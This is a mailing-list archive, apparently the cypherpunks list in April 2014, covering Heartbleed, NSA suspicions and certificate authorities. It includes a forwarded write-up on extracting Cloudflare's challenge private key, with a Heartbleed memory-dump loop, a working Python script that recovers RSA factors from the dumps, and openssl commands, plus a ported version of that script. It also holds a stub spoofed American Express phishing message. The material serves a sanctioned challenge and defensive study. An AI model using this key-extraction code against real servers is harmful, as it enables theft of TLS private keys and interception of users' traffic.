or why would the spies be so interested in hacking professors that deal >> with crypto and whose word is trusted by the masses? Like they did to a >> Belgian cryptographer? Was that fellow nerd a turrist of sorts? >> >> It may be possible that Seggelmann did his job correctly, that the reviewer >> did his job correctly, but someone unknown may have changed it just a little >> bit before delivery. >> >> >> Besides funding projects like OpenSSL better, we should start considering >> the security of the repositories themselves. >> >> What ya fellow coders think?

From grarpamp at gmail.com Fri Apr 11 16:02:53 2014 From: grarpamp at gmail.com (grarpamp) Date: Fri, 11 Apr 2014 19:02:53 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1409607.uUXFrpi0Wi@lap> References: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> <20140411133240.GA16269@sivokote.iziade.m$> <1409607.uUXFrpi0Wi@lap> Message-ID: On Fri, Apr 11, 2014 at 10:43 AM, rysiek wrote: > On Friday, 11 April 2014 16:32:44 Georgi Guninski wrote: >> Is there a significant rise of revoked certs caused >> by HB paranoia? > > No idea, but we're considering revoking ours. As to ocsp/crl revocation, haven't looked (depending on application, getting the cert swapped out is more important anyway). But those of us who pin down certs instead of trusting CA's have been doing quite a bit of reconfiguring this week due to upstream certs being swapped out.

From fraud at americanexpress.com Fri Apr 11 16:08:17 2014 From: fraud at americanexpress.com (American Express) Date: Fri, 11 Apr 2014 19:08:17 -0400 Subject: Irregular check card activity Message-ID: {_BODY_TEXT} -------------- next part -------------- A non-text attachment was scrubbed...
Name: not available Type: text/html Size: 12633 bytes Desc: not available URL:

From rysiek at hackerspace.pl Fri Apr 11 10:54:24 2014 From: rysiek at hackerspace.pl (rysiek) Date: Fri, 11 Apr 2014 19:54:24 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <534820A6.7030408@virtadpt.net> References: <534820A6.7030408@virtadpt.net> Message-ID: <3135353.1KRi2F89Iu@lap> On Friday, 11 April 2014 10:04:38 The Doctor wrote: > The timing of the commit in question is most interesting, indeed: > > http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c508216 > 1b02a22116ad75f822b1 > > ...the date and time of the year when people are least likely to be > sitting at their computers watching for and reviewing commits. Only > better time would probably have been at 2359 hours UTC. Now I love my conspiracy theories just like the next guy and I definitely do not take sides (I am myself quite inclined to think this is not entirely an honest mistake), but... ...the kind of argument you make rings a bell: http://en.wikipedia.org/wiki/Anthropic_bias I agree that this was the very best time for a commit so that nobody sees it/reviews it. Maybe this is why nobody has seen it nor reviewed it? As in, the very fact it is so does not prove that it was done at this time on purpose. -- Regards, rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part.
URL:

From peter at petermalone.org Fri Apr 11 19:57:42 2014 From: peter at petermalone.org (Peter Malone) Date: Fri, 11 Apr 2014 22:57:42 -0400 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <129490266.188962.1397263722030.JavaMail.www@wwinf8312> References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> <53482E2B.4050201@cpunk.us> <129490266.188962.1397263722030.JavaMail.www@wwinf8312> Message-ID: <1397271462.21597.12.camel@shire> I don't buy into conspiracy theories often but I really can't see how you can fail to follow your own RFC. If he had a check in there to make sure the payload_length wasn't too large I would say "hey, he forgot to make sure it wasn't too small and he never even mentioned checking if it was too small in the RFC"... but he actually never checked for anything.. so maybe it is just a mistake. He definitely failed to follow his own RFC which never mentioned making sure the length was correct, just that it wasn't too big, and that's something he never did. I don't get how the reviewer can miss it too, like it's code for an RFC the reviewer is COMPLETELY new to... so at first the code looks a bit mad until you read the RFC, then you realize right away that he's missing shit. Seems silly, I don't think the reviewer ever read the RFC. On Sat, 2014-04-12 at 02:48 +0200, tpb-crypto at laposte.net wrote: > > Message of 11/04/14 20:33 > > From : "Cypher" > > > > I agree that there is no proof that this bug was introduced on purpose > > and it might be a simple oversight (no matter what it looks like or > > could be). We have to keep in mind that one of the things spies do is > > sow suspicion and doubt - it's a powerful weapon! All these > > vulnerabilities we're finding in critical software /might just be/ > > mistakes and oversights. Or they might be deliberate attacks by the > > NSA/GCHQ.
Part of the power these agencies wield is that /we'll likely > > never know/ and so we suspect...everyone. Everything. > > > > Too many bugs, in too many convenient places. One or two may be a coincidence, several of them like it appears to be the case, is not. We know who did it and now even if it is a coincidence, the culprit will be pointed at the NSA. > > The timing the code was included in the tree cannot be a coincidence. There's one more thing we have to look at. When nobody is paying attention, someone is trying to sneak bad code. > > The NSA mandate was to protect the people, not to make them vulnerable. Disbanding such a rogue organization would be the right thing to do.

From tpb-crypto at laposte.net Fri Apr 11 17:48:42 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sat, 12 Apr 2014 02:48:42 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <53482E2B.4050201@cpunk.us> References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> <53482E2B.4050201@cpunk.us> Message-ID: <129490266.188962.1397263722030.JavaMail.www@wwinf8312> > Message of 11/04/14 20:33 > From : "Cypher" > > I agree that there is no proof that this bug was introduced on purpose > and it might be a simple oversight (no matter what it looks like or > could be). We have to keep in mind that one of the things spies do is > sow suspicion and doubt - it's a powerful weapon! All these > vulnerabilities we're finding in critical software /might just be/ > mistakes and oversights. Or they might be deliberate attacks by the > NSA/GCHQ. Part of the power these agencies wield is that /we'll likely > never know/ and so we suspect...everyone. Everything. > Too many bugs, in too many convenient places. One or two may be a coincidence, several of them like it appears to be the case, is not. We know who did it and now even if it is a coincidence, the culprit will be pointed at the NSA.
The timing the code was included in the tree cannot be a coincidence. There's one more thing we have to look at. When nobody is paying attention, someone is trying to sneak bad code. The NSA mandate was to protect the people, not to make them vulnerable. Disbanding such a rogue organization would be the right thing to do.

From tpb-crypto at laposte.net Fri Apr 11 21:06:36 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Sat, 12 Apr 2014 06:06:36 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1397271462.21597.12.camel@shire> References: <534820A6.7030408@virtadpt.net> <3135353.1KRi2F89Iu@lap> <53482E2B.4050201@cpunk.us> <129490266.188962.1397263722030.JavaMail.www@wwinf8312> <1397271462.21597.12.camel@shire> Message-ID: <1560658505.137925.1397275596741.JavaMail.www@wwinf8312> > Message of 12/04/14 04:57 > From : "Peter Malone" > To : tpb-crypto at laposte.net > Cc : "Cypher" , cypherpunks at cpunks.org > Subject : Re: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL > > I don't buy into conspiracy theories often but I really can't see how > you can fail to follow your own RFC. If he had a check in there to make > sure the payload_length wasn't too large I would say "hey, he forgot to > make sure it wasn't too small and he never even mentioned checking if it > was too small in the RFC"... but he actually never checked for > anything.. so maybe it is just a mistake. He definitely failed to follow > his own RFC which never mentioned making sure the length was correct, > just that it wasn't too big, and that's something he never did. > > I don't get how the reviewer can miss it too, like it's code for an RFC > the reviewer is COMPLETELY new to... so at first the code looks a bit > mad until you read the RFC, then you realize right away that he's > missing shit. Seems silly, I don't think the reviewer ever read the RFC.
> Look at the date and time the commit was done by the reviewer, make your own conclusions: http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c5082161b02a22116ad75f822b1

From drwho at virtadpt.net Sat Apr 12 09:45:40 2014 From: drwho at virtadpt.net (The Doctor) Date: Sat, 12 Apr 2014 09:45:40 -0700 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1567248.IM8gzNnxzb@lap> References: <534820A6.7030408@virtadpt.net> <1397271462.21597.12.camel@shire> <1560658505.137925.1397275596741.JavaMail.www@wwinf8312> <1567248.IM8gzNnxzb@lap> Message-ID: <53496DB4.8070200@virtadpt.net>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

On 04/12/2014 01:47 AM, rysiek wrote: > If anybody is to be suspected of anything unsavoury here, it's the > reviewer, I guess. If there was a reviewer looking at it, that is. That'd be the right time of year for teams to accept commits without looking at them. - -- The Doctor [412/724/301/703] [ZS] Developer, Project Byzantium: http://project-byzantium.org/ PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "All talk, no shock!"
--Soundwave, _Transformers: the Movie_
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.22 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iEYEAREKAAYFAlNJbbQACgkQO9j/K4B7F8EjngCfSht7C8hKClYUwSY3QUeRfOs2
Xx0AniU6BrjuiHQaCfYW2kyjqE5lVwfj
=xNyG
-----END PGP SIGNATURE-----

From rysiek at hackerspace.pl Sat Apr 12 01:47:34 2014 From: rysiek at hackerspace.pl (rysiek) Date: Sat, 12 Apr 2014 10:47:34 +0200 Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL In-Reply-To: <1560658505.137925.1397275596741.JavaMail.www@wwinf8312> References: <534820A6.7030408@virtadpt.net> <1397271462.21597.12.camel@shire> <1560658505.137925.1397275596741.JavaMail.www@wwinf8312> Message-ID: <1567248.IM8gzNnxzb@lap> On Saturday, 12 April 2014 06:06:36 tpb-crypto at laposte.net wrote: > Look at the date and time the commit was done by the reviewer, make your own > conclusions: > > http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=4817504d069b4c508216 > 1b02a22116ad75f822b1 If anybody is to be suspected of anything unsavoury here, it's the reviewer, I guess. -- Regards, rysiek -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 316 bytes Desc: This is a digitally signed message part. URL:

From jamesdbell9 at yahoo.com Sat Apr 12 13:37:58 2014 From: jamesdbell9 at yahoo.com (jim bell) Date: Sat, 12 Apr 2014 13:37:58 -0700 (PDT) Subject: Curious Intellectual Property Food-for-thought: "Live-forever Pingers" Message-ID: <1397335078.49963.YahooMailNeo@web126204.mail.ne1.yahoo.com> Some people debate whether 'intellectual property' (such as patents) should exist. The standard for patenting is said to be: An invention, to be patentable, should be "new, useful, and unobvious to those skilled in the art".
A month ago, when it became obvious that finding Air Malaysia Flight 370 could be difficult, the 30-day limit of the electronic pingers got me to thinking. Why? Instead of pinging for 30 days, why not have them ping increasingly slowly, so that the pinger would last 'forever'. Considered discretely, let it ping at the normal rate for 1 week, at half the rate for the next week, at quarter the rate for the subsequent week, etc. Or, have a continuous equivalent of this, a ping-rate which slows to approximate this rate over time. This kind of pinger would 'never' run out. Should this idea be patentable? Is it new? I haven't heard of it. Is it useful? It is now clear why it would be useful...now!!! Is it 'un-obvious'? Well, despite the fact that I just thought of it a month ago, and I had never heard it proposed before, I wonder why it shouldn't be called 'obvious'. If anything, I think it's amazing that it hasn't been implemented before. People who work in aeronautics and electronics are smart and imaginative...at least I thought they were...until now? It should also be possible to include in the ping, information (transmitted by pulse-position information) about the last lat/lon received by the aircraft. Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1872 bytes Desc: not available URL:

From eric at konklone.com Sat Apr 12 10:40:02 2014 From: eric at konklone.com (Eric Mill) Date: Sat, 12 Apr 2014 13:40:02 -0400 Subject: If not StartSSL, the next best CA for individuals? Message-ID: (Setting aside how awful the CA system is generally...) For those who still have a need to participate in it, and for those angry at StartCom's refusal to waive[1][2] revocation fees for their free class 1 certs, what's the best CA for the job? Even if not free, I'm looking to recommend[3] something priced attractively for individuals and non-commercial uses.
The friendlier the interface, and the more reliable and principled the customer service, the better. -- Eric [1] https://cv.exbit.io/emails/startssl_heartbeat.txt [2] https://twitter.com/startssl/status/453631038883758080 [3] https://konklone.com/post/switch-to-https-now-for-free -- konklone.com | @konklone From gfoster at entersection.org Sat Apr 12 17:53:33 2014 From: gfoster at entersection.org (Gregory Foster) Date: Sat, 12 Apr 2014 19:53:33 -0500 Subject: NSA alleged to have known & used Heartbleed for 2 years In-Reply-To: <53485E00.5050500@entersection.org> References: <53484395.9090208@entersection.org> <53485E00.5050500@entersection.org> Message-ID: <5349E00D.3070704@entersection.org> On 4/11/14, 4:26 PM, Gregory Foster wrote: > Bloomberg (Apr 11) - "NSA Said to Have Used Heartbleed Bug, Exposing > Consumers": > http://www.bloomberg.com/news/2014-04-11/nsa-said-to-have-used-heartbleed-bug-exposing-consumers.html > >> The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said. > On 4/11/14, 2:33 PM, Gregory Foster wrote: > Denials: > https://twitter.com/NSA_PAO/status/454720059156754434 > https://twitter.com/csoghoian/status/454725375332192256 > > I couldn't find the primary source for the White House NSC statement > Christopher posted. The "Vulnerabilities Equities Process" used to > ascertain whether or not to report 0-days sounds FOIA-worthy. NYT (Apr 12) - "Obama Lets N.S.A. 
Exploit Some Internet Flaws, Officials Say" by David @SangerNYT: http://www.nytimes.com/2014/04/13/us/politics/after-heartbleed-bug-obama-decides-us-should-reveal-internet-security-flaws.html > Caitlin Hayden, the spokeswoman for the National Security Council, said the review of the recommendations [by a presidential advisory committee] was now complete, and it had resulted in a “reinvigorated” process to weigh the value of disclosure when a security flaw is discovered, against the value of keeping the discovery secret for later use by the intelligence community. > > “This process is biased toward responsibly disclosing such vulnerabilities,” she said. gf -- Gregory Foster || gfoster at entersection.org @gregoryfoster <> http://entersection.com/

From guido at witmond.nl Sat Apr 12 12:12:43 2014 From: guido at witmond.nl (Guido Witmond) Date: Sat, 12 Apr 2014 21:12:43 +0200 Subject: If not StartSSL, the next best CA for individuals? In-Reply-To: References: Message-ID: <5349902B.2050906@witmond.nl> On 04/12/14 19:40, Eric Mill wrote: > (Setting aside how awful the CA system is generally...) > > For those who still have a need to participate in it, and for those > angry at StartCom's refusal to waive[1][2] revocation fees for their > free class 1 certs, what's the best CA for the job? > > Even if not free, I'm looking to recommend[3] something priced > attractively for individuals and non-commercial uses. The friendlier > the interface, and the more reliable and principled the customer > service, the better. Read the draft of Peter Gutmann's big book called Security Engineering. [1] It tells (among other things) the story that people accept scary warnings as a signal that a site is secure. Even if the opposite is true. I suggest creating a self-signed certificate. (Unless you're a bank, as Firefox warns against that). Guido. 1: https://www.cs.auckland.ac.nz/~pgut001/pubs/book.pdf -------------- next part -------------- A non-text attachment was scrubbed...
Name: signature.asc Type: application/pgp-signature Size: 897 bytes Desc: OpenPGP digital signature URL:

From l at odewijk.nl Sat Apr 12 16:28:14 2014 From: l at odewijk.nl (Lodewijk andré de la porte) Date: Sun, 13 Apr 2014 01:28:14 +0200 Subject: NSA good guys In-Reply-To: References: <534691BD.1060904@cathalgarvey.me> Message-ID: I haven't been able to satisfy any clear conditions for being good or bad guys. Not even for being patriots or not. Ultimately it doesn't matter. Their jobs are inherently evil. Spying always has been, but this is different because it involves everyone (even without being suspect) and the costs for additional invasion of privacy\surveillance are negligible. Meaning a single person that doesn't do his/her job can ruin the world (in *many* scenarios). Looking at Snowden there is not the kind of security procedures to prevent it, either. So. Are the NSA guys good guys? Well. They're the enemy of the people, as they invade their privacy and therewith their safety. If you can be blackmailed, studied, influenced, etc. you are weak and vulnerable. Preaching to the choir, I guess. So I cannot call them good guys by a very long shot. Are the NSA guys bad guys? Well, they do anything to protect their nation from whatever attack could happen (bad for non-US; me). They steal secrets for their government (bad for non-US; me). They assist foreign secret agencies in subverting or avoiding legal restrictions put in place to protect citizens as (real/wise/elected) politicians see fit. (very bad for non-US; me) Uh. Yeah. I guess they're the bad guys. I usually feel like they are soldiers on a certain mission, and so no blame comes to them. But I feel more strongly that the organization is built to produce law-breaking, privacy-destroying, unethical, unfriendly, aggressive, anticompetitive, distracting and confusing and ultimately just *mean* practices. So yes: the NSA is *EVIL* to the maximum realistic extent.
The NSA's people enjoy a margin of appreciation. They're doing a job. They have their reasons. But I do believe most of them are keenly aware of the extremely large quantity of thoroughly unethical things their organization is doing, and must be considered at least partially responsible. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2413 bytes Desc: not available URL: From coderman at gmail.com Sun Apr 13 06:44:56 2014 From: coderman at gmail.com (coderman) Date: Sun, 13 Apr 2014 06:44:56 -0700 Subject: a speech In-Reply-To: <20140411024045.274C02280F0@palinka.tinho.net> References: <20140411024045.274C02280F0@palinka.tinho.net> Message-ID: On Thu, Apr 10, 2014 at 7:40 PM, wrote: >... > APT in a World of Rising Interdependence > invited address, NSA, 26 March 2014 > http://geer.tinho.net/geer.nsa.26iii14.txt another great read Dan! thanks :) my only comment, for now: """ Five years ago, Kelly Ziegler calculated that patching a fully deployed Smart Grid would take an entire year to complete, largely because of the size of the per-node firmware relative to the available powerline bandwidth. """ this does not take into consideration the "truck roll" option. it's the network operator's worst nightmare; an option of last resort. the majority of smart grid devices i have analyzed contain both optical and higher speed radio interfaces which may be accessed by a technician on site or near by. much more expensive than the slow trickle broadcast, but to claim a critical fix could be deployed only via one method is a bit misleading. p.s. hacking these devices still an undiscovered country! has your local utility given you one yet? 
best regards,

From coderman at gmail.com Sun Apr 13 06:55:06 2014 From: coderman at gmail.com (coderman) Date: Sun, 13 Apr 2014 06:55:06 -0700 Subject: "How I obtained the private key for www.cloudflarechallenge.com" In-Reply-To: <3142883.qliPh6rQWL@lap> References: <3142883.qliPh6rQWL@lap> Message-ID: On Sun, Apr 13, 2014 at 2:16 AM, rysiek wrote: > Hi there, > > https://gist.github.com/epixoip/10570627

----

I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the 10th to get it. But I'm happy that I was able to prove to myself that I too could do it. The sleepless adventure began yesterday afternoon, 2014-04-12 15:19:04.827516279 -0700. First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially believed that it would be highly improbable under normal conditions to obtain the private key through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to extract private keys. So I wanted to see first-hand if it was possible or not. I started by hastily modifying the hb-test.py that everyone has been using to dump the raw memory contents to a file, rather than print a hexdump. I then left this running in the background for a (very long) while, as I set off to think of an approach.

    while true; do python hb-raw.py www.cloudflarechallenge.com; done

My original thinking was that I could get a large sample of memory, then use some forensic analysis tools to search for keys in the memory dump. This idea went to the wayside, however, as I got sidetracked when I started seeing "BEGIN RSA PRIVATE KEY" strings in the script output. http://bindshell.nl/epixoip/cloudflare_key.png I thought it was too good to be true, but after parsing it out, it was indeed a valid private key, so I submitted it -- unsuccessfully.
This turned out to be the work of trolls who were sending private key contents in heartbeat requests to the server, and I fell for the trollbait. I found several more `private keys' in the dump, and I skeptically tested them anyway, just in case. But they were all fake as well. Fucking trolls. But at least I didn't fall for any of the keys that ended in "LOLJK" ;) So, I decided to get back on track and stick to my original plan. After searching through some forensics mailing lists and reading some papers on the topic, my plan was to parse my dump file, looking for the start of a key in ASN.1 format ("\x30\x82"), and then parse out the key from there. While working on this approach, I had a conversation with Brandon Enright (@bmenrigh) on IRC. This conversation left me thinking that my approach won't work, because the chances of the key being in ASN.1 DER format in memory are about as slim as the key being in PEM format in memory. Brandon, however, suggested a much more reasonable approach:

(19:25:15) < bmenrigh> But my plan would be to interpret all possible portions of the memory dump as however the P and Q factors get encoded and then just trial divide the N modulus from the SSL cert until you get one that divides
(19:26:38) < bmenrigh> you only get up to about 64k of memory on each grab so if you interpret every offset as the start of the dump as whatever a private key looks like it just isn't many trial divisions

By this time though, I had already been working on this for several hours, and it was Friday night, so I didn't want to spend any more time on it. However, I gave it some more thought over dinner, and the more I drank, the more I realized it was far more likely that the binary values of p, or q, or both, were in memory as-is. They likely wouldn't be encoded at all, so we can just shift through the memory dump in $keysize chunks, converting them to bignums and doing the trial divide as Brandon suggested.
This would be really easy to code up and test, so I decided to call it an early night, and rushed home to work on it while the thought (and the liquor) were still fresh in my brain.

The version of hb-test.py that I already had running in the background was dumping memory in 16 KiB chunks, not the full 64 KiB, so the plan would be to read the memory dump in 16 KiB chunks, shifting through each chunk in $keysize sections, testing to see if we have a prime that the modulus is divisible by. I sketched out the following pseudocode:

    while (chunk = fread (file, 16384)) {
        for (offset = 0; offset < len(chunk)-keysize; offset++) {
            p = bignum (chunk[offset-1] .. chunk[offset+keysize-1])
            if (p is prime and modulus % p == 0) {
                q = modulus / p;
                print p, q;
            }
        }
    }

After a few hours of testing and debugging, lo and behold, one of the primes is in my dump. Several times, even. From here, it is trivial to get the private key given p/q and the modulus. I ended up with the following script:

    import sys, base64, gmpy
    from pyasn1.codec.der import encoder
    from pyasn1.type.univ import *

    def main ():
        n = int (sys.argv[2], 16)          # modulus from the cert, as hex
        keysize = n.bit_length() / 16      # byte length of one prime (half the modulus; Python 2 integer division)
        with open (sys.argv[1], "rb") as f:
            chunk = f.read (16384)
            while chunk:
                for offset in xrange (0, len (chunk) - keysize):
                    # read keysize bytes at this offset, little-endian, as a bignum
                    p = long (''.join (["%02x" % ord (chunk[x]) for x in xrange (offset + keysize - 1, offset - 1, -1)]).strip(), 16)
                    if gmpy.is_prime (p) and p != n and n % p == 0:
                        e = 65537
                        q = n / p
                        phi = (p - 1) * (q - 1)
                        d = gmpy.invert (e, phi)
                        dp = d % (p - 1)
                        dq = d % (q - 1)
                        qinv = gmpy.invert (q, p)
                        # PKCS#1 RSAPrivateKey: version, n, e, d, p, q, dp, dq, qinv
                        seq = Sequence()
                        for x in [0, n, e, d, p, q, dp, dq, qinv]:
                            seq.setComponentByPosition (len (seq), Integer (x))
                        print "\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq))
                        sys.exit (0)
                chunk = f.read (16384)
        print "private key not found :("

    if __name__ == '__main__':
        main()

(I'm sorry if this code offends any python aficionados, but I do not write in python very often.)
Putting it all together,

    epixoip at token:~$ while true; do python hb-raw.py www.cloudflarechallenge.com; done

    epixoip at token:~$ echo | openssl s_client -connect www.cloudflarechallenge.com:443 -showcerts | openssl x509 > cloudflare.pem
    depth=4 C = SE, O = AddTrust AB, OU = AddTrust External TTP Network, CN = AddTrust External CA Root
    verify error:num=19:self signed certificate in certificate chain
    verify return:0
    DONE

    epixoip at token:~$ openssl x509 -pubkey -noout -in cloudflare.pem > cloudflare_pubkey.pem

    epixoip at token:~$ python extractkey.py cloudflare.raw $(openssl x509 -in cloudflare.pem -modulus -noout | cut -d'=' -f2) > cloudflare_privkey.pem

    epixoip at token:~$ echo "epixoip has your key" | openssl sha1 -sign cloudflare_privkey.pem -sha1 >signed_proof.bin

    epixoip at token:~$ echo "epixoip has your key" | openssl dgst -verify cloudflare_pubkey.pem -signature signed_proof.bin -sha1
    Verified OK

And just so anyone else can verify it if they wish,

    epixoip at token:~$ echo "epixoip has your key" | openssl sha1 -sign cloudflare_priv.pem -sha1 | base64
    XQT3ZRp1zqK++UUZEWQkib2MX9tiUTN3VEA2G4mj4n86cmc0hTEAS2GO1AgkmoVgshFR/JYxlX74
    s+DHPn4PbyAUB4eC+AqS6T+Wc6PR/Jo4XkF9MTsqLviB/jzSt0wl9pld2RbwMNAToE+HGu5vP4PZ
    wfW6P5E5HTb/lTsONSubJj9FhZWkDNJPn+d0l/8rS4e9AYvQRII8JGfXAa7BOHgT57qw5F03dE8n
    srtAu04CSpos25DdgZN47yCecMKETxWe3PeiyeMIbj6OyLdjF/+JUDeN85vXTUx0P7AzOqCeHNon
    3uBX7CQZgpl30oaqdCFQcdIOhTb2QwdE3FvSzA==

So there you have it. I submitted my proof to Cloudflare about 7 hours ago, so I effectively spent a whole day on it. I wasn't the first to get it, probably not even the 10th. And I did need some guidance (thanks Brandon!) But overall, I am pleased. The next step would be to integrate this into hb-test.py, or ideally just re-write the whole damn thing top-to-bottom in C.
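An added example, not epixoip's script and not part of the gist forwarded above: the same "scan a memory grab for a factor of N" idea ported to Python 3, written for the defensive use of the technique, i.e. running it over a core dump or heap snapshot of your own TLS process to confirm that no prime factor of the published modulus is recoverable (after a key rotation, for instance). Two things differ from the original script: gcd(window, N) replaces the primality test, since any window that shares a factor with N reveals it and no bignum library is needed, and several window widths are tried, so a factor whose byte length is not exactly half the modulus is still caught. The PEM writer hand-encodes DER, so neither pyasn1 nor gmpy is required. P_SAMPLE, Q_SAMPLE, the buffer from build_sample_dump() and EMBED_OFFSET are constructed toy values, not the challenge key; Python 3.8+ is assumed for pow(x, -1, m).

```python
# Added example (not the gist's code): Python 3 factor scan over a memory buffer,
# for checking one's OWN server dumps. All key material is a constructed toy.
import base64
from math import gcd

P_SAMPLE = (1 << 61) - 1        # Mersenne prime M61 (constructed toy value)
Q_SAMPLE = (1 << 64) - 59       # largest prime below 2^64 (constructed toy value)
N_SAMPLE = P_SAMPLE * Q_SAMPLE  # 125-bit toy modulus
EMBED_OFFSET = 1000             # where the sample dump hides P_SAMPLE (assumption)


def build_sample_dump(size=4096):
    """Constructed stand-in for one heartbeat memory grab: non-zero pseudo-random
    filler with one prime factor of N_SAMPLE written little-endian at EMBED_OFFSET,
    the same byte order the original script reads (OpenSSL BIGNUM limbs on a
    little-endian host)."""
    filler = bytearray((i * 131 + 7) % 255 + 1 for i in range(size))
    filler[EMBED_OFFSET:EMBED_OFFSET + 8] = P_SAMPLE.to_bytes(8, "little")
    return bytes(filler)


def find_factor(buf, n, widths=None):
    """Slide a window over buf, read it as an integer in both byte orders and test
    gcd(window, n). Returns (offset, width, byteorder, factor) for the first
    non-trivial hit, else None. By default every width from 1 byte up to the
    modulus length is tried, so factors of any byte size are found."""
    if widths is None:
        widths = range(1, (n.bit_length() + 7) // 8 + 1)
    for off in range(len(buf)):
        for w in widths:
            window = buf[off:off + w]
            if len(window) < w:
                break                      # ran off the end; wider windows will too
            for order in ("little", "big"):
                g = gcd(int.from_bytes(window, order), n)
                if 1 < g < n:              # g == n means the window was n itself
                    return off, w, order, g
    return None


def rsa_from_factor(n, p, e=65537):
    """Rebuild the full PKCS#1 private key from one prime factor, with the same
    CRT parameters (dp, dq, qinv) the original script computes."""
    q = n // p
    if p * q != n:
        raise ValueError("p does not divide n")
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)                    # modular inverse, Python 3.8+
    return {"n": n, "e": e, "d": d, "p": p, "q": q,
            "dp": d % (p - 1), "dq": d % (q - 1), "qinv": pow(q, -1, p)}


def der_length(length):
    """DER length octets: short form below 128, long form (0x8N + N bytes) otherwise."""
    if length < 0x80:
        return bytes([length])
    body = length.to_bytes((length.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def der_integer(x):
    """DER INTEGER for non-negative x: minimal big-endian two's complement, i.e. a
    leading 0x00 appears only when the top bit would otherwise read as a sign."""
    body = x.to_bytes((x.bit_length() + 8) // 8, "big")
    return b"\x02" + der_length(len(body)) + body


def pkcs1_pem(key):
    """PEM 'RSA PRIVATE KEY' block: SEQUENCE of version 0 and the eight integers."""
    fields = (0, key["n"], key["e"], key["d"], key["p"], key["q"],
              key["dp"], key["dq"], key["qinv"])
    body = b"".join(der_integer(v) for v in fields)
    der = b"\x30" + der_length(len(body)) + body
    b64 = base64.b64encode(der).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return ("-----BEGIN RSA PRIVATE KEY-----\n" + "\n".join(lines)
            + "\n-----END RSA PRIVATE KEY-----\n")


def recover_key(dump, n):
    """Whole pipeline: locate a factor of n in dump and return the PEM, or None."""
    hit = find_factor(dump, n)
    if hit is None:
        return None
    return pkcs1_pem(rsa_from_factor(n, hit[3]))


if __name__ == "__main__":
    dump = build_sample_dump()
    print("hit:", find_factor(dump, N_SAMPLE))   # (1000, 8, 'little', 2305843009213693951)
    print(recover_key(dump, N_SAMPLE))
```

The default width range costs len(buf) times the modulus byte length gcd calls, which is fine for a toy modulus but slow for a 2048-bit key over many 16 KiB grabs; for a real check pass `widths=(128,)` (or 128 and 129) to `find_factor`, which is the original script's fixed half-modulus window plus one byte of slack. A result of None across every grab is the outcome a defender wants to see.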
From coderman at gmail.com Sun Apr 13 06:56:31 2014
From: coderman at gmail.com (coderman)
Date: Sun, 13 Apr 2014 06:56:31 -0700
Subject: "How I obtained the private key for www.cloudflarechallenge.com"
In-Reply-To:
References: <3142883.qliPh6rQWL@lap>
Message-ID:

On Sun, Apr 13, 2014 at 6:55 AM, coderman wrote:
> ...

well that formatted horribly. time for coffee...

(link to raw is https://gist.githubusercontent.com/epixoip/10570627/raw/570510ed21c5db6301dc377b834760b32b818f73/cloudflare_challenge for you curl'ers...)

From coderman at gmail.com Sun Apr 13 07:00:36 2014
From: coderman at gmail.com (coderman)
Date: Sun, 13 Apr 2014 07:00:36 -0700
Subject: NTRU Prime implementation
Message-ID:

reification requested!

http://blog.cr.yp.to/20140213-ideal.html

"""
Here's a concrete suggestion, which I'll call NTRU Prime, for eliminating the structures that I find worrisome in existing ideal-lattice-based encryption systems. This suggestion uses a number field of prime degree, so that the only subfield is Q; and uses an irreducible polynomial x^p-x-1 with a very large Galois group, so that the number field is very far from having automorphisms. The best CVP dimension seems to be about half the degree; this is optimal for number fields without many real embeddings. (It's hard to create many real embeddings while keeping coefficients small, and if coefficients are large then there are other problems.) This suggestion also chooses its modulus q so that (Z/q)[x]/(x^p-x-1) is a field; this simultaneously avoids (1) NTRU's traditional 2-adic structure and (2) the linear splittings used in most recent papers.
"""

From coderman at gmail.com Sun Apr 13 07:08:27 2014
From: coderman at gmail.com (coderman)
Date: Sun, 13 Apr 2014 07:08:27 -0700
